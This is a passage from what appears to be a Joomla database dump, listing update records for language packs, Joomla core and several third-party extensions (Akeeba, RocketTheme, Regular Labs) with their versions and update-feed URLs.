Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(11416,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(11417,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(11418,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(11419,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(11420,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(11421,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(11422,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(11423,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(11424,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(11425,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(11426,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(11427,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(11428,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(11429,57,0,'English US','','pkg_en-US','package','',0,'3.9.15.2','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(11430,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(11431,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(11432,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(11433,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(11434,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(11435,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(11436,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(11437,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(11438,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(11439,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(11440,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(11441,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(11442,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(11443,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(11444,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(11445,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(11446,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(11447,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(11448,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(11449,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(11450,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(11451,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(11452,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(11453,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.10','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-10.html\n				',''),(11454,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(11455,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-1.html\n				',''),(11456,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11457,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(11458,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(11459,3,0,'French','','pkg_fr-FR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(11460,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(11461,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(11462,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(11463,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(11464,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(11465,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(11466,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(11467,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(11468,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(11469,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(11470,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(11471,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(11472,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(11473,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(11474,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(11475,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(11476,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(11477,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(11478,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(11479,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(11480,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(11481,3,0,'English US','','pkg_en-US','package','',0,'3.9.15.2','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(11482,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(11483,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(11484,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(11485,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(11486,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(11487,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(11488,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(11489,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(11490,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(11491,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(11492,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(11493,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(11494,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(11495,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(11496,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(11497,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(11498,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(11499,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(11500,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(11501,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(11502,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(11503,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(11504,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(11505,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11506,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(11507,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(11508,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(11509,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(11510,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(11511,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(11512,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(11513,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(11514,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(11515,57,0,'French','','pkg_fr-FR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(11516,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(11517,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(11518,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(11519,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(11520,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(11521,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(11522,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(11523,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(11524,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(11525,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(11526,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(11527,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(11528,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(11529,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(11530,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(11531,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(11532,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(11533,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(11534,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(11535,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(11536,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(11537,57,0,'English US','','pkg_en-US','package','',0,'3.9.15.2','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(11538,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(11539,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(11540,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(11541,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(11542,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(11543,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(11544,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(11545,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(11546,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(11547,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(11548,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(11549,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(11550,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(11551,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(11552,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(11553,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(11554,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(11555,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(11556,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(11557,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(11558,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(11559,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(11560,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(11561,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(11562,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.10','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-10.html\n				',''),(11563,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(11564,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-1.html\n				',''),(11565,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(11566,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11567,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11568,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11569,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11570,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(11571,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11572,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11573,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11574,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11575,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(11576,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(11577,3,0,'French','','pkg_fr-FR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(11578,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(11579,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(11580,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(11581,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(11582,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(11583,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(11584,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(11585,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(11586,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(11587,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(11588,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(11589,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(11590,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(11591,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(11592,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(11593,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(11594,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(11595,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(11596,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(11597,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(11598,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(11599,3,0,'English US','','pkg_en-US','package','',0,'3.9.15.2','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(11600,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(11601,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(11602,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(11603,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(11604,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(11605,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(11606,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(11607,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(11608,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(11609,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(11610,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(11611,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(11612,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(11613,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(11614,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(11615,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(11616,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(11617,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(11618,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(11619,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(11620,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(11621,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(11622,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(11623,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11624,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(11625,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(11626,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(11627,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(11628,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(11629,20,0,'RokCommon 